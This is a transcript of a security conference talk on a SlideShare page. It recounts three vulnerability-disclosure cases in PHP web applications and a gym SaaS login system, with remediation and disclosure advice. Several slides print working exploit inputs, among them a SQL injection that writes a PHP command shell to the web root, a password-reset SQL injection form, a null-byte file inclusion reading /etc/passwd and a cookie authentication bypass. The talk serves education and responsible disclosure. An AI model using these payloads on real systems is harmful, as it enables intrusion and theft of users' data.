• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
It’s Vulnerable… Now What?: Three Tales of Woe and Remediation
 

It’s Vulnerable… Now What?: Three Tales of Woe and Remediation

on

  • 1,772 views

 

Statistics

Views

Total Views
1,772
Views on SlideShare
1,771
Embed Views
1

Actions

Likes
0
Downloads
18
Comments
0

1 Embed 1

http://mstanislav.posterous.com 1

Accessibility

Categories

Upload Details

Uploaded via as Apple Keynote

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n

It’s Vulnerable… Now What?: Three Tales of Woe and Remediation It’s Vulnerable… Now What?: Three Tales of Woe and Remediation Presentation Transcript

  • Its Vulnerable… Now What? Three Diverse Tales of Woe and RemediationMark Stanislav <mark.stanislav@gmail.com>
  • De-Facto Quote Slide“Thank goodness the working exploitwill remain as the ‘gold standard’ forcutting through the BS in the field ofdata security for the foreseeable future.” - Marsh Ray Source: http://seclists.org/fulldisclosure/2011/Jan/397 ; it’s legit
  • The More Hats The Better
  • The More Hats The BetterDay Job: Linux systems administrator
  • The More Hats The BetterDay Job: Linux systems administratorNight Job: Adjunct lecturer at a university
  • The More Hats The BetterDay Job: Linux systems administratorNight Job: Adjunct lecturer at a universityBoredom: Finding web app vulnerabilities
  • The More Hats The BetterDay Job: Linux systems administratorNight Job: Adjunct lecturer at a universityBoredom: Finding web app vulnerabilitiesSide Note: PHP programmer for ~10 years* * Quickly becoming a Ruby fiend
  • PHP Vulnerability Primer
  • PHP Vulnerability PrimerInputs That Get Owned:
  • PHP Vulnerability PrimerInputs That Get Owned: $_GET: Query Strings index.php?user=mstanislav
  • PHP Vulnerability PrimerInputs That Get Owned: $_GET: Query Strings index.php?user=mstanislav $_POST: Form Submission <input type=”text” name=”user”>
  • PHP Vulnerability PrimerInputs That Get Owned: $_GET: Query Strings index.php?user=mstanislav $_POST: Form Submission <input type=”text” name=”user”> $_COOKIE: Cookies Chocolate Chip -- nom nom.
  • PHP Vulnerability Primer, cont.
  • PHP Vulnerability Primer, cont.Common Attacks:
  • PHP Vulnerability Primer, cont.Common Attacks: Local File Inclusion (LFI) Show me your /etc/passwd file
  • PHP Vulnerability Primer, cont.Common Attacks: Local File Inclusion (LFI) Show me your /etc/passwd file SQL Injection Show me your user table
  • PHP Vulnerability Primer, cont.Common Attacks: Local File Inclusion (LFI) Show me your /etc/passwd file SQL Injection Show me your user table Authentication/Authorization Bypass Who needs a username or password?
  • Tale #1 - On The Clock
  • Tale #1 - On The ClockScenario: A client hires a PHPdeveloper to create a web site for theirfinancial service company (Forex)
  • Tale #1 - On The ClockScenario: A client hires a PHPdeveloper to create a web site for theirfinancial service company (Forex)Problem: Developer has no businesswriting a ‘Hello, World!’ application, letalone a web application handling creditcard data
  • Vulnerabilities Found
  • Vulnerabilities FoundAdjust ‘membership level’ of any account
  • Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded default
  • Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user password to a desired value
  • Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user password to a desired valueDelete all user accounts
  • Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user password to a desired valueDelete all user accountsRetrieve ACH account information
  • Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user password to a desired valueDelete all user accountsRetrieve ACH account informationRetrieve all user account details
  • Vulnerabilities FoundAdjust ‘membership level’ of any accountReset account passwords to hardcoded defaultChange any user password to a desired valueDelete all user accountsRetrieve ACH account informationRetrieve all user account detailsCreate an administrative user account
  • Clown Shoes“Something or someone that is a total joke” Source: Urban Dictionary; it’s legit
  • Code Review, Part #1
  • Code Review, Part #1Vulnerable Codefunction updateMembershipLevel() { list($level,$email) = GetVars(level,email); DB_query("UPDATE users SET membership_level = $level WHERE email = $email");}
  • Code Review, Part #1Vulnerable Codefunction updateMembershipLevel() { list($level,$email) = GetVars(level,email); DB_query("UPDATE users SET membership_level = $level WHERE email = $email");}Exploitfoo.php?mod=user&req=updatelevel&level=100&email=user@example.com
  • Code Review, Part #1Vulnerable Code function updateMembershipLevel() { list($level,$email) = GetVars(level,email); DB_query("UPDATE users SET membership_level = $level WHERE email = $email"); }Exploitfoo.php?mod=user&req=updatelevel&level=100&email=user@example.comWhy The Code Sucks•No authentication prior to allowing execution of updateMembershipLevel()•There is no audit trail to changes being made through this function•The code does not escape or sanitize $_GET variables being passed
  • Code Review, Part #2
  • Code Review, Part #2Vulnerable Codefunction updatePassword() { list($resetkey,$pass) = PostVars(resetkey,pass1); $html = ReadTemplate(password,password_email_form); $sql = "UPDATE users SET passwd = md5(".DB_escape_string($pass).") WHERE resetkey=$resetkey"; DB_query($sql);[...]}
  • Code Review, Part #2Vulnerable Codefunction updatePassword() { list($resetkey,$pass) = PostVars(resetkey,pass1); $html = ReadTemplate(password,password_email_form); $sql = "UPDATE users SET passwd = md5(".DB_escape_string($pass).") WHERE resetkey=$resetkey"; DB_query($sql);[...]}Exploit<form name="attacker" action="foo.php?mod=password&req=update" method="post"> <input type="text" name="resetkey" value=" OR resetkey IS NOT NULL OR resetkey=TRUE" /> <input type="text" name="pass1" value="test" /></form>
  • Code Review, Part #2Vulnerable Codefunction updatePassword() { list($resetkey,$pass) = PostVars(resetkey,pass1); $html = ReadTemplate(password,password_email_form); $sql = "UPDATE users SET passwd = md5(".DB_escape_string($pass).") WHERE resetkey=$resetkey"; DB_query($sql);[...]}Exploit<form name="attacker" action="foo.php?mod=password&req=update" method="post"> <input type="text" name="resetkey" value=" OR resetkey IS NOT NULL OR resetkey=TRUE" /> <input type="text" name="pass1" value="test" /></form>•Only the password input Sucks properly, the ‘resetkey’ $_POST input is notWhy The Code is escaped•SQL doesn’t use parameterized statements to protect against general SQLinjection
  • Code Review, Part #3
  • Code Review, Part #3Vulnerable Codefunction insertUser() { if ((is_SuperUser()) && (isset($_SESSION[virtual_client_id])) { $clientID = $_SESSION[virtual_client_id]; } else { $clientID = $_SESSION[client_id]; } list($first,$last,$email,$groupID,$passwd,$addr1,$addr2,$city,$state,$zip) =GetVars(first,last,email,group,passwd,addr1,addr2,city,state,zip);[...]}
  • Code Review, Part #3Vulnerable Codefunction insertUser() { if ((is_SuperUser()) && (isset($_SESSION[virtual_client_id])) { $clientID = $_SESSION[virtual_client_id]; } else { $clientID = $_SESSION[client_id]; } list($first,$last,$email,$groupID,$passwd,$addr1,$addr2,$city,$state,$zip) =GetVars(first,last,email,group,passwd,addr1,addr2,city,state,zip);[...]}Exploitfoo.php?mod=adminusers&req=insert&passwd=test&email=a@b.com&group=1
  • Code Review, Part #3Vulnerable Codefunction insertUser() { if ((is_SuperUser()) && (isset($_SESSION[virtual_client_id])) { $clientID = $_SESSION[virtual_client_id]; } else { $clientID = $_SESSION[client_id]; } list($first,$last,$email,$groupID,$passwd,$addr1,$addr2,$city,$state,$zip) =GetVars(first,last,email,group,passwd,addr1,addr2,city,state,zip);[...]}Exploitfoo.php?mod=adminusers&req=insert&passwd=test&email=a@b.com&group=1Why The Code Sucks•insertUser() method isn’t restricted from being available to unauthenticated site visitors•is_SuperUser() doesn’t affect arbitrary calls to add a user to the database•No sanitization or verification is done to any data based on $_GET variables passed
  • Remediation
  • RemediationCreated an executive summary of thevulnerabilities, their associated impacts, andrecommendations to resolve the issues.
  • RemediationCreated an executive summary of thevulnerabilities, their associated impacts, andrecommendations to resolve the issues.The developer was fired and a new one washired who fixed the issues; which I verified.
  • RemediationCreated an executive summary of thevulnerabilities, their associated impacts, andrecommendations to resolve the issues.The developer was fired and a new one washired who fixed the issues; which I verified.Fun Fact: The developer who wrote this codeuses the same code-base for 30+ sites currentlyonline using the same framework...
  • What’s a CVE?
  • What’s a CVE?Common Vulnerabilities & Exposures
  • What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identifier will give you a standardizedidentifier for any given vulnerability orexposure.” - MITRE CVE FAQ
  • What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identifier will give you a standardizedidentifier for any given vulnerability orexposure.” - MITRE CVE FAQOnly for packaged software offerings
  • What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identifier will give you a standardizedidentifier for any given vulnerability orexposure.” - MITRE CVE FAQOnly for packaged software offeringsIdeally used in a ‘responsible disclosure’ process
  • What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identifier will give you a standardizedidentifier for any given vulnerability orexposure.” - MITRE CVE FAQOnly for packaged software offeringsIdeally used in a ‘responsible disclosure’ processKeeps issues organized and easy to reference
  • What’s a CVE?Common Vulnerabilities & Exposures“A CVE Identifier will give you a standardizedidentifier for any given vulnerability orexposure.” - MITRE CVE FAQOnly for packaged software offeringsIdeally used in a ‘responsible disclosure’ processKeeps issues organized and easy to referenceHelps to prevent duplication of vulnerabilities
  • How Do I Get a CVE?
  • How Do I Get a CVE?1.Find the vulnerability -- score!
  • How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve supposedly found: you could be wrong/late.
  • How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve supposedly found: you could be wrong/late.3.Contact a CVE Numbering Authority (CNA)
  • How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve supposedly found: you could be wrong/late.3.Contact a CVE Numbering Authority (CNA)4.Ideally the vendor cares and fixes the issue
  • How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve supposedly found: you could be wrong/late.3.Contact a CVE Numbering Authority (CNA)4.Ideally the vendor cares and fixes the issue5.Release your advisory with the CVE included
  • How Do I Get a CVE?1.Find the vulnerability -- score!2.Try and verify with the vendor what you’ve supposedly found: you could be wrong/late.3.Contact a CVE Numbering Authority (CNA)4.Ideally the vendor cares and fixes the issue5.Release your advisory with the CVE included6.Provide links of publication back to MITRE
  • Tale #2 - The Community
  • Tale #2 - The CommunityScenario: Random PHP applications you findon SourceForge.net & FreshMeat.net
  • Tale #2 - The CommunityScenario: Random PHP applications you findon SourceForge.net & FreshMeat.netProblem: Not everyone releasing free (as inGNU) or paid (as in $$$) are goodprogrammers -- surprise!
  • WSN Links SQL Injection
  • WSN Links SQL InjectionVulnerable CodeDidnʼt copy it down, but basically:‘namecondition’ and ‘namesearch’ $_GET values allow for a SQL injectionwhen unified to bridge existing SQL queries to allow for exploitation
  • WSN Links SQL InjectionVulnerable CodeDidnʼt copy it down, but basically:‘namecondition’ and ‘namesearch’ $_GET values allow for a SQL injectionwhen unified to bridge existing SQL queries to allow for exploitationExploitsearch.php?namecondition=IS NULL)) UNION ((SELECT "<?phpsystem($_REQUEST[cmd]); ?>" INTO OUTFILE&namesearch=/var/www/exec.php&action=filter&filled=1&whichtype=categories
  • WSN Links SQL InjectionVulnerable CodeDidnʼt copy it down, but basically:‘namecondition’ and ‘namesearch’ $_GET values allow for a SQL injectionwhen unified to bridge existing SQL queries to allow for exploitationExploitsearch.php?namecondition=IS NULL)) UNION ((SELECT "<?phpsystem($_REQUEST[cmd]); ?>" INTO OUTFILE&namesearch=/var/www/exec.php&action=filter&filled=1&whichtype=categoriesWhy The Code Sucks•Improper sanitization of $_GET inputs within some functions of search•No explicit installation recommendation to prevent FILE privilege•Side Note: foo.php?debug=1 turns on debugging in the default installation
  • WSN Links Remediation
  • WSN Links RemediationCVE-2010-4006
  • WSN Links RemediationCVE-2010-4006Vendor blacklisted ‘UNION’ within searchqueries as a ‘fix’ to the issue
  • WSN Links RemediationCVE-2010-4006Vendor blacklisted ‘UNION’ within searchqueries as a ‘fix’ to the issueNew version released 3 days after notificationhad occurred
  • WSN Links RemediationCVE-2010-4006Vendor blacklisted ‘UNION’ within searchqueries as a ‘fix’ to the issueNew version released 3 days after notificationhad occurredIt would be better to actually fix all of the SQLinjection bugs (yes, there are more) rather thanusing a bandage like a UNION blacklist
  • Pointter CMS Authentication Bypass
  • Pointter CMS Authentication BypassVulnerable CodeOn all administrative pages:if (!isset($_COOKIE[auser]) or !isset($_COOKIE[apass])) { header("location:index.php");}
  • Pointter CMS Authentication BypassVulnerable CodeOn all administrative pages:if (!isset($_COOKIE[auser]) or !isset($_COOKIE[apass])) { header("location:index.php");}ExploitSimply create ‘auser’ and ‘apass’ cookies. The contents of the cookies don’timpact the exploitation as there is no verification of contents before ‘using’ thecookies as a valid authentication mechanism.
  • Pointter CMS Authentication BypassVulnerable CodeOn all administrative pages:if (!isset($_COOKIE[auser]) or !isset($_COOKIE[apass])) { header("location:index.php");}ExploitSimply create ‘auser’ and ‘apass’ cookies. The contents of the cookies don’timpact the exploitation as there is no verification of contents before ‘using’ thecookies as a valid authentication mechanism.Why The Code Sucks•There’s no reason to store a password cookie in the first place•A session cookie should be unique and encrypted•Blank cookies should never be used as a form of authentication
  • Pointter CMS Remediation
  • Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333
  • Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333 Two separate products, same vulnerability
  • Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333 Two separate products, same vulnerabilityNo updates have been released to fix the issue
  • Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333 Two separate products, same vulnerabilityNo updates have been released to fix the issueDisclosure to vendor was met with legal threatsand very funny dialog (you’ll see...)
  • Pointter CMS RemediationCVE-2010-4332 & CVE-2010-4333 Two separate products, same vulnerabilityNo updates have been released to fix the issueDisclosure to vendor was met with legal threatsand very funny dialog (you’ll see...)Vendor claims that the user should rename theiradmin folder to hide, erm... prevent the issue! =)
  • The Swiss“Not as docile as you’d expect...” Source: Me; it’s legit
  • E-Mail Outtakes!
  • E-Mail Outtakes!“We do not understand why you try tomanipulate the softwares. I am sure that you areaware that it is illegal to do so.”
  • E-Mail Outtakes!“We do not understand why you try tomanipulate the softwares. I am sure that you areaware that it is illegal to do so.”“...it is not your duty to publish anything relatedabout our softwares as long as we ask for it.”
  • E-Mail Outtakes!“We do not understand why you try tomanipulate the softwares. I am sure that you areaware that it is illegal to do so.”“...it is not your duty to publish anything relatedabout our softwares as long as we ask for it.”“What you are trying to do, is to find a securityhole and publish it so that everyone can hack asystem. This is the illegal part so be aware ofthis.”
  • E-Mail Outtakes!, cont.
  • E-Mail Outtakes!, cont.“The illegal thing is to publish a security gap toshow other people the way how to attack. Thatis the same as telling someone how to build abomb.”
  • E-Mail Outtakes!, cont.“The illegal thing is to publish a security gap toshow other people the way how to attack. Thatis the same as telling someone how to build abomb.”“Of course, it could be made safer and we knowhow to do it. But we have designed thesoftwares so that renaming admin folder givesus less work.”
  • Null-Byte Attack Primer
  • Null-Byte Attack PrimerPHP uses C functions for filesystem calls whichreads a null-byte as ‘end of string’
  • Null-Byte Attack PrimerPHP uses C functions for filesystem calls whichreads a null-byte as ‘end of string’include(“/var/www/” . $_GET[‘file’] . “.php”);
  • Null-Byte Attack PrimerPHP uses C functions for filesystem calls whichreads a null-byte as ‘end of string’include(“/var/www/” . $_GET[‘file’] . “.php”);index.php?file=../../../etc/passwd
  • Null-Byte Attack PrimerPHP uses C functions for filesystem calls whichreads a null-byte as ‘end of string’include(“/var/www/” . $_GET[‘file’] . “.php”);index.php?file=../../../etc/passwd include(“/var/www/../../../etc/passwd.php”);
  • Null-Byte Attack PrimerPHP uses C functions for filesystem calls whichreads a null-byte as ‘end of string’include(“/var/www/” . $_GET[‘file’] . “.php”);index.php?file=../../../etc/passwd include(“/var/www/../../../etc/passwd.php”);index.php?file=../../../etc/passwd%00
  • Null-Byte Attack PrimerPHP uses C functions for filesystem calls whichreads a null-byte as ‘end of string’include(“/var/www/” . $_GET[‘file’] . “.php”);index.php?file=../../../etc/passwd include(“/var/www/../../../etc/passwd.php”);index.php?file=../../../etc/passwd%00 include(“/var/www/../../../etc/passwd”);
  • Pulse CMS Local File Inclusion
  • Pulse CMS Local File InclusionVulnerable Code$page = $_REQUEST[p];switch ($page) { case $page: include("includes/". $page .".php"); break;}
  • Pulse CMS Local File InclusionVulnerable Code$page = $_REQUEST[p];switch ($page) { case $page: include("includes/". $page .".php"); break;}Exploitindex.php?p=/../../../../../../../../../../../../../../etc/passwd%00
  • Pulse CMS Local File InclusionVulnerable Code$page = $_REQUEST[p];switch ($page) { case $page: include("includes/". $page .".php"); break;}Exploitindex.php?p=/../../../../../../../../../../../../../../etc/passwd%00Why The Code Sucks•This method to prevent LFI is easily defeated with magic_quotes_gpc disabled•There’s no sanitization or regex used to prevent LFI attacks•Null-byte attacks are a problem with PHP (C-based) and need to be considered
  • Pulse CMS Remediation
  • Pulse CMS RemediationCVE-2010-4330
  • Pulse CMS RemediationCVE-2010-4330Vendor patched the current version immediatelyand then released a few version a few days later
  • Pulse CMS RemediationCVE-2010-4330Vendor patched the current version immediatelyand then released a few version a few days laterNull-byte attacks are a real problem andprogrammers need to program with it in mind
  • Pulse CMS RemediationCVE-2010-4330Vendor patched the current version immediatelyand then released a few version a few days laterNull-byte attacks are a real problem andprogrammers need to program with it in mindFile inclusion from a user-controlled variableshould heavily interrogated (regex/sanitization)
  • Tale #3 - SaaS Gone Wrong
  • Tale #3 - SaaS Gone WrongScenario: You sign-up for a gym membership
  • Tale #3 - SaaS Gone WrongScenario: You sign-up for a gym membershipProblem: Your gym’s online fitness integrationweb site has broken Single Sign-On causingmassive PII/PHI leakage
  • SSO “Bypass”
  • SSO “Bypass”Vulnerable CodeHave no access to companyʼs site code, but hereʼs my best guess...checkAuthentication($memberid, $gymid) { //Implement this later, kthx!}
  • SSO “Bypass”Vulnerable CodeHave no access to companyʼs site code, but hereʼs my best guess...checkAuthentication($memberid, $gymid) { //Implement this later, kthx!}Exploithttp://www.example.com/diff/partners/member_activate.aspx?memberid=[memberid_integer]&gymid=[gymid_integer]
  • SSO “Bypass”Vulnerable CodeHave no access to companyʼs site code, but hereʼs my best guess...checkAuthentication($memberid, $gymid) { //Implement this later, kthx!}Exploithttp://www.example.com/diff/partners/member_activate.aspx?memberid=[memberid_integer]&gymid=[gymid_integer]Why The Code Sucks•It didn’t require users to ‘sign-up’ for some of their data to be available•Complete SSO implementation failure•No one could have possibly tested/QA’ed this code before it was launched
  • Vulnerability Verification
  • Vulnerability VerificationScript #1: Out of 10,000 sequential memberidvalues roughly 2,700 accounts existed in either anactivated or unactivated state.
  • Vulnerability VerificationScript #1: Out of 10,000 sequential memberidvalues roughly 2,700 accounts existed in either anactivated or unactivated state.Script #2: Of the 1,000 memberid valueschecked, 76 accounts were activated. One userprofile had a picture, eight users had listed phonenumbers, and at least one user had a medicalquestionnaire filled-out.
  • Information Being Disclosed
  • Information Being DisclosedUnactivated Account: First Name, Last Name,Date of Birth, Gender, and E-Mail Address
  • Information Being DisclosedUnactivated Account: First Name, Last Name,Date of Birth, Gender, and E-Mail AddressActivated Account: Photo, First Name, LastName, Date of Birth, Gender, E-Mail Address,Phone Number, Height, Weight, Body Fat %,Timezone, Gym Membership Company,Workout Schedule, and Medical History (bloodpressure issues, heart problems, recent surgery,pregnancy, diabetes, etc.)
  • Remediation
  • RemediationContacted CEO (small company) with a report
  • RemediationContacted CEO (small company) with a reportLots of follow-up e-mails with increasingamounts of people (read: lawyers/execs) added
  • RemediationContacted CEO (small company) with a reportLots of follow-up e-mails with increasingamounts of people (read: lawyers/execs) addedConsistently reaffirmed my commitment to helpand deflected any comments towards me beingsome kind of nefarious hacker
  • RemediationContacted CEO (small company) with a reportLots of follow-up e-mails with increasingamounts of people (read: lawyers/execs) addedConsistently reaffirmed my commitment to helpand deflected any comments towards me beingsome kind of nefarious hackerTook three weeks after successful contact tohave the issue actually fixed...
  • Customers Notified
  • Customers Notified 90,000+
  • But be careful...
  • But be careful...It’s a very thin line between committing a crimeand just trying to help a web site with a problem
  • But be careful...It’s a very thin line between committing a crimeand just trying to help a web site with a problemDon’t make threats, don’t ‘force their hand’; berespectful, professional, and continuously affirmyour desire to protect people and information
  • But be careful...It’s a very thin line between committing a crimeand just trying to help a web site with a problemDon’t make threats, don’t ‘force their hand’; berespectful, professional, and continuously affirmyour desire to protect people and informationAnyone can be sued at anytime for anything inour country -- it doesn’t mean you’re guilty, butyou can certainly lose time and money this way
  • But be careful...It’s a very thin line between committing a crimeand just trying to help a web site with a problemDon’t make threats, don’t ‘force their hand’; berespectful, professional, and continuously affirmyour desire to protect people and informationAnyone can be sued at anytime for anything inour country -- it doesn’t mean you’re guilty, butyou can certainly lose time and money this wayLet your ethics and common sense lead you...
  • Generalized Take-Aways
  • Generalized Take-AwaysDo the right thing, consistently, and peoplewon’t have much room to actually threaten you
  • Generalized Take-AwaysDo the right thing, consistently, and peoplewon’t have much room to actually threaten youFull-disclosure to the community helps to keepdevelopers and businesses accountable for theproducts and services they offer
  • Generalized Take-AwaysDo the right thing, consistently, and peoplewon’t have much room to actually threaten youFull-disclosure to the community helps to keepdevelopers and businesses accountable for theproducts and services they offerResponsible disclosure allows you to make morefriends than enemies; most people are reallyappreciative of your assistance
  • Generalized Take-AwaysDo the right thing, consistently, and peoplewon’t have much room to actually threaten youFull-disclosure to the community helps to keepdevelopers and businesses accountable for theproducts and services they offerResponsible disclosure allows you to make morefriends than enemies; most people are reallyappreciative of your assistanceVulnerability research is tediously fun! ;)
  • My Thoughts...
  • My Thoughts...Info Sec. is everyone’s responsibility
  • My Thoughts...Info Sec. is everyone’s responsibilityDon’t accept an answer of “well, we didn’t buildthis with security in mind...”
  • My Thoughts...Info Sec. is everyone’s responsibilityDon’t accept an answer of “well, we didn’t buildthis with security in mind...”Ethics and information security are not, in mymind, allowed to be separated
  • My Thoughts...Info Sec. is everyone’s responsibilityDon’t accept an answer of “well, we didn’t buildthis with security in mind...”Ethics and information security are not, in mymind, allowed to be separatedThis isn’t about 1337 ‘sploits. It’s aboutprotecting your business, your friends, yourfamily, and yourself from unethical people
  • Thanks...Jon Oberheide - Duo SecuritySteve Christy - MITRETodd Jarvis - Packet Storm Security
  • ContactE-Mail: mark.stanislav@gmail.comTwitter: @markstanislavWebsite: http://www.uncompiled.com